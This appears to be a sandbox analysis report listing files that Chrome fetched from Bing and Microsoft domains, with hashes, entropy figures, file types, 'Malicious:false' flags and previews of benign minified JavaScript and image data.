                                                                                                      Preview:var BingAtWork;(function(n){var t;(function(n){function t(t,i){var u,r;t.isAuthenticated&&(n.raiseAuthEventAndLog(t),u=_ge("sb_form_q"),u&&(r=u.getAttribute("value"),r&&(n.fetchLowerHeader(r),n.fetchScopeBar(r),i.notifEnabled&&i.notifFetchAsync&&n.fetchNotificationConditional())))}function i(n,i){n&&n.length==2&&t(n[1],i)}n.bindToConditionalSignIn=function(n){sj_evt.bind("ssofirstquery",function(t){return i(t,n)},!0,null,!1)}})(t=n.ConditionalSignIn||(n.ConditionalSignIn={}))})(BingAtWork||(BingAtWork={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1663), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1663
                                                                                                      Entropy (8bit):5.118614360470706
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QAKJFFGRc/spJg2WNaQorUcn7RzdAHWd3TRdZhtRkYAe/V5r0nA97StrLntMPU6:wKJFkimqjcrw4D/tD9VWcS1etkEy96vZ
                                                                                                      MD5:D81844C2EBCF5F3260A692E3E89DDE7F
                                                                                                      SHA1:5A3874FB9F597E42FDD94E5BC5DA0A709B70D57A
                                                                                                      SHA-256:9905F086F3F40AC4B8EC2C9F0752A157ED637B2FFC2C87971E8306D6CB12FE9F
                                                                                                      SHA-512:8005F3EBD5BC8DC903917DF581563595EA3E427F31992260AA4E6ED8BC30095442174AD153A83C378575FFB2DE878338B0E87D8CDD57DFDC49E646CA9E4ADA77
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/Wjh0-59ZfkL92U5bxdoKcJtw1Xo.js
                                                                                                      Preview:(function(){function v(){n&&(sj_be(_d.body,"click",y),sj_be(n,"click",p),f&&sj_be(f,"click",w),sj_evt.bind("PrimaryNavDropdownMenuShow",i),sj_evt.bind("scs_openflyout",i))}function y(){typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)&&i()}function p(r){r.stopPropagation();typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)?i():b()}function w(n){n.stopPropagation();var t=s(n.target);t!=null&&Log&&Log.Log&&Log.Log("Click",u,"ScopeDropdownMenuItemClick",!1,"ItemId",t.id);c.trigger(i,null)}function s(n){return n===null?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,e)||Lib.CssClass.contains(n,"b_sp_over_cont")?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,a)?n:n.parentElement?s(n.parentElement):null}function b(){sj_evt.fire("ScopeDropdownMenuShow");typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(n,t);r&&typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(r,o);Log&&Log.Log&&Log.Log("Show",u,"ScopeDropdownMenuShow");n.setAttribute("aria
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 60 x 60, 8-bit colormap, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1929
                                                                                                      Entropy (8bit):7.811068957377272
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:SbgS+jqY4I/a8na4MDgpl2RU/gZ2xY5X/:SbgS+x4IJ2Eu/2xC/
                                                                                                      MD5:4C155FCB5DD3DA464451AD240B6DE606
                                                                                                      SHA1:7A6F3C8D8AF764EBFBC97DC0AA8394E73F041270
                                                                                                      SHA-256:D43878B92743C77FDB440C222D97F70CA661122C98B45436D0DA5B2DB98468ED
                                                                                                      SHA-512:061EDA91A7C4679EF824E3E79B8B52090D1DE129D76008B1A697FE7A0F1900B89473EF635A7D2D909C6E684C0BD63B338B89F897F4CC00D5B5C64341A7433136
                                                                                                      Malicious:false
                                                                                                      URL:https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png
                                                                                                      Preview:.PNG........IHDR...<...<......")@....PLTEGpL..^.lT.Z.....8.L...._.i..[...^....yu.do.T....|...X.@<.U..W..BL.S. g.(....,.X..l}..%Y.l.L.H...]..Y\.O.Z.m.>.V..t....t.ZH......T...,.....W.@..J...........}.V..qA.b>.6...V..R.F?.w..p.~...J.P....6...U<.W...k'..s.\/..q.]..B..I#..8...yE.;.....V.7..5...l....sw...#.p.....7..>=..m.@..C..T.P..X..n}<...S.....Z..P..]..{..[=..W..Y..R.k.p.]..o.<..N.Z.l ...F.....h@.h..o..u..8=.tC.....k..J..S.H..zT.G?.UH.c.U....%...F=.e...c.....q.wv.Q...H.~r..`.U..J...N.`.*...N..j...i Y..{u....N...f.O...U*...zE.a..U..X..]..k@.....Z.pB.R=.V...S.b..q{..L.......L=.rG..L.......W..a.....T..Y.A......R.........Gb.g..'....R...L....f..Y.&..3.."...ty.b=......U../L.{R.s......j.a..>..#w.Y..P5....H..l......F...o.D7..8....*..h.V..W.`.m.|.U.T....-.."......4.....9.`.M.......2..+...^_..Xq......[tRNS.. .0. ..u.@P..g.h...xwo..(*..h..._.P``....P `..p...P._......@........@@..0.P@@.)=.7....IDATx^..SteI...37Ng.i.3..4.....m...m..j.S....~..s~..u.q.:....)zW...*..y
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1725
                                                                                                      Entropy (8bit):5.274895734185393
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                                                      MD5:2EF3074238B080B648E9A10429D67405
                                                                                                      SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                                                      SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                                                      SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                                                      Malicious:false
                                                                                                      Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (888), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):888
                                                                                                      Entropy (8bit):5.1970220185324045
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QiCUrgtI/QHnUrtrRIRJ7ea/TwH4Mnbx+yGow0N:SK44AIb/7QUH0N
                                                                                                      MD5:F1CF1909716CE3DA53172898BB780024
                                                                                                      SHA1:D8D34904E511B1C9AAE1565BA10CCD045C940333
                                                                                                      SHA-256:9ABAC0CBFA6F89106B66CD4F698EAD5CCBF615ECF8CD7E9E88567A7C33CFEC01
                                                                                                      SHA-512:8B641E93405565B4A57C051EDEFC8E02D6C929DDD4C52F9BFBD19C57896AA40426BF5ED6760DBD479719561C4F0A25BFC4102F0F49D3D308035C9CA90B1D0FCE
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/2NNJBOURscmq4VZboQzNBFyUAzM.js
                                                                                                      Preview:(function(){function f(){var u=o(),i,t,f;if(u)for(i=s(u),t=0;t<i.length;t++)f=i[t].id.replace(n,""),Log&&Log.Log&&Log.Log("Info",r,f,!1,"Text",t.toString()),sj_be(i[t],"mousedown",e)}function e(t){var r=i(t.target),f;r!=null&&(f=r.id.replace(n,""),Log&&Log.Log&&Log.Log("Info",u,f))}function i(t){if(t!=null){var r=t.id;return r!=null&&r.indexOf(n)===0?t:i(t.parentElement)}return null}function o(){var n=_d.querySelectorAll(".b_scopebar > ul");return n&&n.length>0?n[0]:null}function s(i){for(var r,o,u=[],e=i.children,f=0;f<e.length;f++)r=e[f].id,r!=null&&r!==t&&r.indexOf(n)===0?u.push(e[f]):r!=null&&r===t&&(o=h(),u.push.apply(u,o));return u}function h(){var n=_d.querySelectorAll(".b_scopebar #b-scopeListItem-menu .b_sp_over_menu .b_scopebar_item");return Array.prototype.slice.call(n)}var n="b-scopeListItem-",t=n+"menu",r="DynScopeRank",u="DynScopeClick";sj_evt.bind("onP1",f)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (37756), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):37756
                                                                                                      Entropy (8bit):5.5286674347569065
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:6jiIrpis31lUc4jzmU62pffR75Ql+HCmEOO8C0EBNrpA23/H8tQJ1CN9MQWt3/p9:6Ph31SUA15u+QvctMxbMVX5Xu
                                                                                                      MD5:423885818D67BFCF00E21BE13F6F3A71
                                                                                                      SHA1:A79144758AF1204BB161FCD79E74C1F692AFB7A5
                                                                                                      SHA-256:5BB552BEB00AF20A3A39660DECABBA8520CF53FF43594D1CD923F9217081D169
                                                                                                      SHA-512:99343F25EC96FE803D57A1787CEFF649A5350DE6E5624990214D604CDD6CB3A4C5A8C069A024712C83E70AB91424AC1AC1F7D3C7E16F9FD498342C46DED593A2
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/p5FEdYrxIEuxYfzXnnTB9pKvt6U.js
                                                                                                      Preview:!function(){const noop=()=>{},optionsScript=document.querySelector("script[type=esms-options]"),esmsInitOptions=optionsScript?JSON.parse(optionsScript.innerHTML):{};Object.assign(esmsInitOptions,self.esmsInitOptions||{});let shimMode=!!esmsInitOptions.shimMode;const importHook=globalHook(shimMode&&esmsInitOptions.onimport),resolveHook=globalHook(shimMode&&esmsInitOptions.resolve);let fetchHook=esmsInitOptions.fetch?globalHook(esmsInitOptions.fetch):fetch;const metaHook=esmsInitOptions.meta?globalHook(shimModule&&esmsInitOptions.meta):noop,skip=esmsInitOptions.skip?new RegExp(esmsInitOptions.skip):null;let nonce=esmsInitOptions.nonce;const mapOverrides=esmsInitOptions.mapOverrides;if(!nonce){const nonceElement=document.querySelector("script[nonce]");nonceElement&&(nonce=nonceElement.nonce||nonceElement.getAttribute("nonce"))}const onerror=globalHook(esmsInitOptions.onerror||noop),onpolyfill=esmsInitOptions.onpolyfill?globalHook(esmsInitOptions.onpolyfill):()=>{console.log("%c^^ Module T
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):49911
                                                                                                      Entropy (8bit):7.994516776763163
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                      Malicious:false
                                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (838), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):838
                                                                                                      Entropy (8bit):5.10179630103155
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:01rReu5mXKBj/BsKkRW5LuRWCfRM7ssdvcR:09wwDEw56w2+s6cR
                                                                                                      MD5:8C8B189422C448709EA6BD43EE898AFB
                                                                                                      SHA1:A4D6A99231D951F37D951BD8356D9D17664BF447
                                                                                                      SHA-256:567506D6F20F55859E137FCBD98F9E1A678C0D51192FF186E16FD99D6D301CFF
                                                                                                      SHA-512:6FAA73D59082065426769A27081CBEDCD22146EF948AFDD9A86801F205B2DDDC63E03AC5D555EF0AF23EF05901EBFFE7E8AADD82260EF505CB89D99E572FDF4A
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/pNapkjHZUfN9lRvYNW2dF2ZL9Ec.js
                                                                                                      Preview:var CursorProgress;(function(n){function f(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function e(n){var u,e,o,s;n.button!==0||n.ctrlKey||n.shiftKey||(u=f(sj_et(n)),u!=null)&&u.getAttribute("role")!=="button"&&(r(),e=(u.getAttribute("href")||"").trim().toLowerCase(),e!==""&&e.indexOf("javascript:")!==0&&e.indexOf("#")!==0)&&(o=u.getAttribute("target"),o===null||o.trim()==="")&&(Lib.CssClass.add(u,t),s=_ge("b_content"),s!==null&&Lib.CssClass.add(s,t),i!==null&&(sb_ct(i),i=null),i=sb_st(r,5e3))}function r(){for(var i=_d.getElementsByClassName(t),n=i.length-1;n>=0;n--)Lib.CssClass.remove(i[n],t)}function u(){var r=_ge("b_content"),n,t,i;if(r!==null&&(n=r.getElementsByTagName("A"),n))for(t=0;t<n.length;t++)(i=n[t],i)&&sj_be(i,"click",e)}var t="b_CursorProgress",i=null;n.bind=u;u()})(CursorProgress||(CursorProgress={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:40:12], progressive, precision 8, 160x160, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6817
                                                                                                      Entropy (8bit):7.859219052464007
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:sO4w46jQPjxS2VUxVMkjqHqHfGaOUE37ri:sO346jojxR0WKHfoe
                                                                                                      MD5:0C41EE31B04E978B4882D17690F03A3A
                                                                                                      SHA1:1890E62ABDFF4D2DD0A66E8A10BF5429440A50EE
                                                                                                      SHA-256:97785743A5FFC303FF8B7B465CD12AF8403F7EED2B2D19687E118E2621059741
                                                                                                      SHA-512:88555E4C500A6B416E8A8E783497B1F6925EEAF708991080E3776757102D9D522CA4830CE924ACA23EC55C579AAC5CFCA7116343236FE8BF8A13FB2DFBD104AD
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:40:12....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................!e."E.T....!......S-C`!..bB.e.J2.z..:<....9.=.[....... .l..Rwy...X..s..u....!.a gNe..+......r...!..-8ZX%..!.e..e../.]..e.vk.R0._;.|..<hE...l..i..,.s.Ec.e.G..T....|.s..K..............+.|.q.=..1*r..$vSb..^q.(hk/..w8...;.v..p:.....C.k.....q.(.M..M.....}q.r+...N.....#.xK.O.....Ci.S=s...}ea[..>MC4.zN;w.Z.%...g.....jo:.g..L.7.......K3...oa.}.=3.<No.|*l..q...#Iszt.z..g..%...z..m.....q....t.L%.\Xc..r:.a...........*s{.A..=.z%.W....y}}..W..2......*^..s..^...R.$..K..E'M........c.[..Buhvu....H...7N.=...o|...Z[\.:.=..3.......jP...k....p.....r. ...!R.z2....*`T.......H.*k,..`.@..$P@G...(....
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (576), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):576
                                                                                                      Entropy (8bit):5.192163014367754
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
                                                                                                      MD5:F5712E664873FDE8EE9044F693CD2DB7
                                                                                                      SHA1:2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
                                                                                                      SHA-256:1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
                                                                                                      SHA-512:CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/KjCBfzuZ475zX0-Fu2bdXt9qifQ.js
                                                                                                      Preview:var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame||(SsoFrame={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1961), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1961
                                                                                                      Entropy (8bit):5.161995541916183
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2ap+ya7O4Hy6lt4CZntuJwzjy8PRzncCk+I7qjuyx:2ap+y76y6vHz7pDJoLg
                                                                                                      MD5:6932CD1A76E6959AD4D0F330D6536BB4
                                                                                                      SHA1:E2E7160642FE28BD731A1287CFBDA07A3B5171B7
                                                                                                      SHA-256:041EB2E6F2582F4C19C0820ACF9A0E9A2C7262EDEDE0D397A5F6F0215E83F666
                                                                                                      SHA-512:28BD0BB200704FBAC0DE2D7C3D1C64A38D5567F79BF24B9C9894C7C6A3B80BB69A5C9F0929CF82163C8E8D39CB6667A2AC81DCB4E6D2072CC7FEDFB63219E584
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/4ucWBkL-KL1zGhKHz72gejtRcbc.js
                                                                                                      Preview:var AjaxDataLoader;(function(n){function t(n,t,i){if(i===void 0&&(i=null),!n)return null;var r="data-"+t;return i===null?n.getAttribute(r):(n.setAttribute(r,i),i)}function r(n){var t=sj_ce("div",null,"spinner"),i=sj_ce("div",null,"inner");t.appendChild(i);n.insertBefore(t,n.childNodes[0])}function u(n,r,u,f,e,o,h,c,l){e===void 0&&(e=function(){});o===void 0&&(o=function(){});h===void 0&&(h=function(){});c===void 0&&(c=function(){});l===void 0&&(l=function(){});var a=function(t,i){n.innerHTML=f;Log.Log("Error",u,"Ajax",!1,"R",t,"S",i.toString(),"U",r);h(n,t,i);e&&e(n)},v=function(f){l();n.innerHTML=f;try{s(n);_w.rms&&_w.rms.start();t(n,i,""+(new Date).getTime());o(n);e&&e(n)}catch(h){Log.Log("Error",u,"ScriptException",!1,"Tx",h.message,"U",r);c(n);e&&e(n)}};AjaxRequestProcessor.SendRequest(r,null,null,a,v,1e4)}function s(n){var i=n.getElementsByTagName("script"),t,r;if(i)for(t=0;t<i.length;t++)r=i[t],h(r)}function h(n){if(n){var t=sj_ce("script","");t.type="text/javascript";n.src?t.src
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1060
                                                                                                      Entropy (8bit):5.351152776949957
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1nAA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGD0zRPo
                                                                                                      MD5:F4DA106E481B3E221792289864C2D02A
                                                                                                      SHA1:D8BA5C1615A4A8ED8EE93C5C8E2EA0FB490A0994
                                                                                                      SHA-256:47CB84D180C1D6BA7578C379BDC396102043B31233544E25A5A6F738BB425AC9
                                                                                                      SHA-512:66518EE1B6C0DF613074E500A393E973844529CA81437C4BAFE6BF111CBA4D697AF4FE36B8D1B2AA9B25F3EB93CD76DF63ABFC3269AC7E9F87C5F28A3764008E
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(document.body,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:38:22], progressive, precision 8, 160x160, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):5387
                                                                                                      Entropy (8bit):7.799957991588148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sQ+bfdSpU7SG7bVFwZ1w2f7yXMAZpqdiCRf6LtoIJ7g0WRiKQS+FhIeEIboU3cq:sRdSpU7vbVFwZ11jIIO6M7JqoIZuz3cq
                                                                                                      MD5:69D162774F894FF8B920330E376B7A62
                                                                                                      SHA1:F79CF9C0CCB851C7DB4924A54B0EFCD2F4398CA0
                                                                                                      SHA-256:C9FAA34663FE19EB4D8C007BF00AD7C4BC993F70C9FC42A04801ECCDD59008F7
                                                                                                      SHA-512:9D0E7FA4AC408D9D7D86186E05258BDB615B04AE8EC0DF813C3307A646EC4F87AABA1FCD77914AEA1FFE3607B87BBCA2DCC5D18C076D8AECDEA1496910AEC87D
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/95z5wMy4UcfbSSSlSw780vQ5jKA.jpg
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:38:22....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.......................................................................................S&....1...\.g).l.....^S......^,I..c.7,..YX(."..>wiT.y.:^8........R*.-)s..>.+@..c..V.[Af...T.........3........B.|.~...A..|..r.......(qC..m~..nb...r.LIU.i3.K..........y.]5..\W;b.:/F...v.OW.R^...y^}4._...I4.t....l......,.$.C.....6..IS..E...../..J...5...%....Z.eK.u....j.........*x.{..t.!....@,...}..W...X8.S.........X.Z...-.w..(.8...z..EC..\....8.m5...z....Y.!\...!@.<:b].-.i}.....?..%...=gE.VM..\.2CJ..kK.d...o.!..v...M.e..4,...l...Y0...V.[.g..r.....h.....[-..-.....J....9kA..L...#.!"."kO.;...R.2...)Mr...X8....G.;A..".!az..Ud.Ie......+..........................!34 "12..$0ABCD........
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1578), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1578
                                                                                                      Entropy (8bit):5.329734499973321
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QDoc8McY0tjLr4H5uRlcHeO0M2AieYIriev+OmbTkC6+xbDntex3CcldxQp3j7O:NfZuRy0N1eYZ0waSbO3CBp/GiCHAhG
                                                                                                      MD5:0C0AD3FD8C0F48386B239455D60F772E
                                                                                                      SHA1:F76EC2CF6388DD2F61ADB5DAB8301F20451846FA
                                                                                                      SHA-256:DB6DDE4AEF63304DF67B89F427019D29632345D8B3B5FE1B55980F5D78D6E1E7
                                                                                                      SHA-512:E45A51EF2F0021F168A70AC49BDCC7F4FB7B91FF0DDD931F8ECBD70F6494C56285B2D9BC1170804801CE178244CCF361745B677B04C388B608D1471E0695EBEB
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/927Cz2OI3S9hrbXauDAfIEUYRvo.js
                                                                                                      Preview:(function(){function d(n,t){for(var r=[],i=0;i<t.length;i++)r.push({MonitorID:t[i].name,RequestID:t[i].guid,Result:Math.round(n[i])});return JSON.stringify(r)}function u(){function n(){return Math.floor((1+Math.random())*65536).toString(16).substring(1)}return n()+n()+n()+n()+n()+n()+n()+n()}function h(){return window.performance&&window.performance.getEntriesByName?!0:!1}function c(n,t,i,r,u,f){function l(i){var w,b,p,k,y,g,nt;if(e!=null&&sb_ct(e),s[i]=c!=null?(new Date).getTime()-c:-1,i=(a+v)%n.length,o=new Image,a++<n.length)c=(new Date).getTime(),o.onload=function(){l(i)},w=function(){o.onload=null;o.onerror=null;c=null;l(i)},e=sb_st(function(){w()},t),o.onerror=function(){e!=null&&sb_ct(e);e=null;w()},o.src=n[i];else{if(r!=null&&r.length!==0){if(h())for(y=0;y<n.length;y++)b=n[y],p=window.performance.getEntriesByName(b),s[y]!=-1&&p&&p[0]&&(s[y]=p[0].duration);for(k=d(s,u),y=0;y<r.length;y++)g=r[y],nt=new Image,nt.src=g+k}f!=null&&f()}}var c,e,s=[],v=Math.floor(Math.random()*n.lengt
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):129811
                                                                                                      Entropy (8bit):5.619465648048296
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:XMRtMQDjoZjZtC58i64oeolxf6DjwrgGUO7BJ7b3gVAvSlqAd+/vwcoOYWddwCit:XMlDjoZjrMadKwrgGTalZY3YW2Z
                                                                                                      MD5:E7E35008D6D94811E9026ACF117D23BB
                                                                                                      SHA1:E2DC282820FC562A637C0637B735FB414A85173A
                                                                                                      SHA-256:CECD9507277624BD8BAAC9FCDBEDE428A6BC827C41635F5B34478C5ABEE4E0BB
